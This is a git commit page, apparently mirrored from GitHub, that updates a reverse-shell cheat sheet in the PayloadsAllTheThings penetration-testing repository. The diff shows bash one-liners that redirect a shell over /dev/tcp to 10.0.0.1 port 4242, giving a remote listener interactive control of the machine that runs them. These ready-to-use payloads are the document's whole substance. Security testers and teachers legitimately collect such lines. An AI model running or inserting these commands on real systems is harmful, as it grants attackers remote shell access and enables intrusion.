1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-05-24 05:56:27 +02:00

Merge pull request #348 from pswalia2u/patch-1

Update Reverse Shell Cheatsheet.md
This commit is contained in:
Swissky 2021-04-26 10:05:59 +02:00 committed by GitHub
commit 1592756f9c
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -46,6 +46,8 @@
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1
```
### Bash UDP